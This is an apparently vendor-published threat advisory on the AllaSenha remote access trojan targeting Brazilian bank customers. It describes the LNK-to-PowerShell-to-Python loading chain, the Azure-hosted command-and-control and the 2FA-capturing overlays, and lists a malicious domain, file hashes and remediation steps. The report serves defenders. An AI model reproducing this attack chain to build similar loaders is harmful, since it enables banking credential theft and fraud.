Multiple Jenkins Plugins Vulnerabilities
May 30, 2024CVE-2024-4388 – CAS Plugin for WordPress Vulnerability
May 30, 2024Multiple Jenkins Plugins Vulnerabilities
May 30, 2024CVE-2024-4388 – CAS Plugin for WordPress Vulnerability
May 30, 2024Severity
High
Analysis Summary
A recent operation that targets Brazilian financial institutions disseminates AllaSenha, a customized version of the Windows-based AllaKore remote access trojan (RAT).
The malware uses Azure cloud as a command-and-control (C2) infrastructure to obtain credentials needed to access bank accounts in Brazil. Banks like Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi are among the targets of the campaign. The initial access vector suggests that malicious links are used in phishing emails, however, this is not proven.
A malicious Windows shortcut (LNK) file that poses as a PDF document ("NotaFiscal.pdf.lnk") that has been hosted on a WebDAV server since at least March 2024 is the initial point of attack. Furthermore, there's evidence that the threat actors behind this action have hosted payloads on GitHub and Autodesk A360 Drive, two legitimate platforms, in the past.
Upon launch, the LNK file retrieves a BAT payload called "c.cmd" from the same WebDAV server URL and launches a Windows command shell intended to open a bogus PDF file to the intended recipient. The file, known as the BPyCode launcher, initiates a PowerShell command that is Base64-encoded and then downloads the Python binary from the official Python website to run a Python script with the codename BPyCode.
For its part, BPyCode acts as a downloader, launching the dynamic-link library ("executor.dll") in memory. One of the domain names produced by a domain generation algorithm (DGA) is where the DLL is retrieved from. Researchers noted that the hostnames that were generated appear to correspond with the Microsoft Azure Functions service, which is a serverless architecture that would enable operators to quickly install and switch between staging environments.
The three files that are retrieved by BPyCode are a second Python loader script, a ZIP archive containing the PythonMemoryModule package, and another ZIP archive containing "executor.dll". After that, the new Python loader script is started to use PythonMemoryModule to load executor.dll, a malware that is based on Borland Delphi and is also known as ExecutorLoader, into memory. The main responsibility of ExecutorLoader is to decode AllaSenha and run it by injecting it into a valid mshta.exe process.
AllaSenha can display overlay windows to capture two-factor authentication (2FA) codes and even fool a victim into scanning a QR code to approve a fraudulent transaction that the attackers have initiated. This capability goes beyond simply taking online banking account credentials from web browsers. An additional examination of the source code connected to the original LNK file and AllaSenha samples has shown that a threat actor who speaks Portuguese is probably involved in the creation of the malware, though there is currently no proof that they are also using the tools.
Threat actors operating in Latin America seem to be an especially fruitful source for efforts including cybercrime. Although these attackers almost mainly target individuals in Latin America to obtain banking credentials, they frequently compromise devices that belong to businesses worldwide even when they are run by Brazilian subsidiaries or workers.
Impact
- Financial Loss
- Credential Theft
- Command Execution
Indicators of Compromise
Domain Name
- nfe-digital.digital
MD5
- 07714040b1524405bbbed893cdd74b94
- ce3a895eb2270dc891369cca221defef
- f55c6664ff3833ccdc6a05e4bbd4c820
- cd4f87e63be918ec6ef8d39082669834
- 0a01bb1fcda802b0bba56bd1a777fc3e
- 6a0910e448e860725341a0c2604aaad5
- f71a93619cdb9cb1ac9496af78ae7a63
- d5649324acdda023dd0d010f59939989
- 134c369ee48111df0c5b4fdb209b0f58
- f150e25fc167967153fce6281d00b6f4
- b52d69caf00e623cca80fe8f3e4b2cd0
- 33347a93efa03a601d3325a5b1adc2bb
- 59ea2e8001a4b64c8f6bb14a3cce4ae9
SHA-256
- f848c0f66afc7b5a10f060c1db129529a974ae0ad71a767f7c7793351bb7ca04
- c300749ea44f886be1887b3e19b946efbdbbc3e1bf3e416c78cfbff8d23bf70a
- 0d94547a0b8f9795e97e2a4a58b0ece65b4ea4b6e6019cbc96e1c79f373b4587
- a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef
- 21e22c4736e7567b198b505ed303c3ca933e0c2d931b886756f6db18a9884a75
- 2c1251ae1ec9d417bbbdd1f6ac99baa3f16a7639d0c12cb2883ef8c22c73e58e
- e50bde1e319e699f587d3b5403c487e46deed61cc3f078fe951e7cb9f6896259
- f00cb0603c055c85c7cdf9963d919d527b13013c182dc115ba733d28da57b1d9
- 4546bc56c85ad2967859dc34b2c84f15891fcd192e86bfc630c49dc8d59e3e71
- 643563613fb78f88fd90a6cf253ace9e9e6686568fdf6b6d7ec9760667d4d72b
- 6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e
- 3b0eb25ed6c0dff76a613bdcfd20ca1d2f482e3c1739747bf50834ca784e66bb
- b152346c2679392d7e15d1cc72a39a21d24e55360c4c1c845ef3524924e93fa9
SHA1
- 1ad79a184722a5b29db1046475d5b987da976589
- efd86577edd62e058ace9644628c6715db170653
- 7a988f7c9116e43c9b938c4e5ed7036adf9af1b8
- 77a144bb45fff156050324b8318741bcae27d9f8
- 40cb5d8b1e78463f5be09f1bdaaea08423eaca8b
- 6384b5697d6c242885bb4883d3ab8ccef1655f2f
- f06426f4bf15fd2bbc6628708667a475cd818898
- 96b37b9c15f517f65ff9b4237ae228c6f504f82a
- 71b1bd839c09e5bd24c3513eb7a2e51f6a3b5164
- 350cb22deef16cc5d755ea572484a3e01c48f6f2
- 9af9677c43c819617cdf221df3ffca11589a026e
- 9451985c7ce2c97ac1246074ee813c6588a548b3
- d7671efbc4cac4cc12429b657ad30758913f2373
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Ensure that all operating systems, software, and applications are regularly updated with the latest security patches.
- Conduct regular security awareness training for users to recognize and avoid phishing emails.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
- Implement network segmentation to limit lateral movement within the network.
- Implement continuous monitoring of network traffic and endpoint activities to detect any unusual or suspicious behavior.
- Develop and regularly test an incident response plan to ensure a swift and effective response in case of a security incident.
- Implement SIEM solutions to centralize log collection and analysis. This can help in identifying patterns of suspicious behavior and provide timely alerts for potential security incidents.
- Regularly back up critical data and ensure that the backup copies are stored securely.